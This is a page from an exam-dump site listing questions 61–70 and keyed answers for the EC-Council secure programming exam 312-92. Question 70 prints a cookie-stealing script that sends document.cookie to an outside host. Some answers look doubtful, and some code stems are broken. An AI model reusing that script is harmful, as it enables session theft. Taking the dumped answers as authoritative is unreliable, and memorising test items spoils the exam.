Dumps4cert.com : Latest Dumps with PDF and VCE Files
2018 Jan ECCouncil Official New Released 312-92
100% Free Download! 100% Pass Guaranteed!
http://www.Dumps4cert.com/312-92.html
EC-Council Certified Secure Programmer (ECSP)
Question No: 61
What is the security and cryptographic framework used in Mac OS X called?
-
AppleSecure
-
CSAPI
-
CDSA
-
Secure API
Answer: C
Question No: 62
Kevin wants to use an SSL certificate from his Mac OS X server so that he can send and receive encrypted email. What would Kevin accomplish by typing in the following command?
certtool c k=/Users/root/Library/Keychains/certkc
-
Remove any unnecessary permissions on the file quot;certkcquot;
-
Create keychain called quot;certkcquot;
-
Copy the root certificate of the server to the file quot;certkcquot;
-
Import encryption key into the file quot;certkcquot;
Answer: B
Question No: 63
Fred has just finished developing a number of ASP pages that will be posted to his company#39;s website. Fred does not want the page#39;s source code viewed by anyone, so he decided to encode the pages to make the source code unusable. What will the following command accomplish?
screnc /e asp *.* c:\tmp
-
Create an MD5 hash for all ASP files in the c:\tmp directory
-
Encode all ASP files in current directory as ASP files and place them in the c:\tmpdirectory
-
Encode all ASP files and place them in the c:\tmp directory
-
Encode all ASP files in in the c:\tmp and place them in the default IIS virtual directory
Answer: B
Question No: 64
Jacob is the system administrator for his company, managing over 20 Linux-based servers.
Jacob wants to ensure that his servers are secure so he decides to add the following line to the /etc/sysctl.conf file:
net.ipv4.conf.all.rp_filter = 1 What will this line accomplish?
-
Prevent spoofing of incoming packets that appear to be from the computer#39;s defaultgateway
-
Prevent spoofing of incoming packets that appear to be from local machine
-
Allow incoming packets only from own subnet
-
Allow outgoing packets only through primary network card
Answer: B
Question No: 65
What type of problem or error will result from the following statement?
void f2b(void * arg, size_t len)
{
char buffer[100]; long val = …;
long *ptr = …; extern void (*f)();
memcpy(buff, arg, len);
*ptr = val; f();
return;
}
-
Pointer subterfuge
-
Heap smashing
-
Virtual pointer smashing
-
Sign error
Answer: A
Question No: 66
Gloria is the lead operation manager for a movie production company in Las Vegas. She has been asked with ensuring that the new movie created by the company will fit on one side of a DVD disk that will be sold to the public. If the movie mentioned is a full-length production and must fit on one side of the disk, what level of compression must Gloria use?
-
100 Mb/s
-
10.5 Mb/s
-
3.8 Mb/s
-
7.2 Mb/s
Answer: D
Question No: 67
What functionality of the Oracle Identity Management system facilitates real-time integration of multiple directories and user repositories through a single LDAP service?
-
Access and Identity
-
Virtual directory
-
Federation
-
Provisioning
Answer: B
Question No: 68
In the following socket programming code, who will the server allow connections from?
int main(void)
{
int s1, s2;
s1 = socket(AF_INET, SOCK_STREAM, 0);
sin.sin_port = htons(30); sin.sin_family = AF_INET; sin.sin_addr.s_addr = 0;
bind(sockfd, (struct sockaddr *)amp;sin, sizeof(sin)); listen(sockfd, 10);
s2 = accept(sockfd, 10); write(s2, quot;hello\nquot;, 6)
}
-
Only those coming in on TCP port 10
-
Only those on the same subnet as the server
-
Only those coming in on UDP port 10
-
Anyone
Answer: D
Question No: 69
When making a RPC function call on the local machine, what function should be used?
-
ncacn_ip_tcp
-
lclrpc
-
ncalrpc
-
get_local_rpc
Answer: C
Question No: 70
Gerald is a web security consultant for Protectors International. Gerald#39;s main responsibility is to search the Internet for malicious and deceitful sites that the public should be aware of. Gerald was tipped off about a particular site and is now looking over its source code in a protected environment. Gerald finds the following snippet particularly interesting. What has Gerald stumbled upon?
lt;scriptgt;
document.write(#39;lt;form name=hack method=post action=quot;http:// scarysite.com/getit.phpquot;gt;
lt;input type=hidden name=sid value=quot;#39; escape(document.cookie) #39;quot;gt;#39;);
document.hack.submit();
lt;/scriptgt;
-
Hidden post command
-
Hidden form fields
-
JavaScript hijacking
-
XSS attack
Answer: B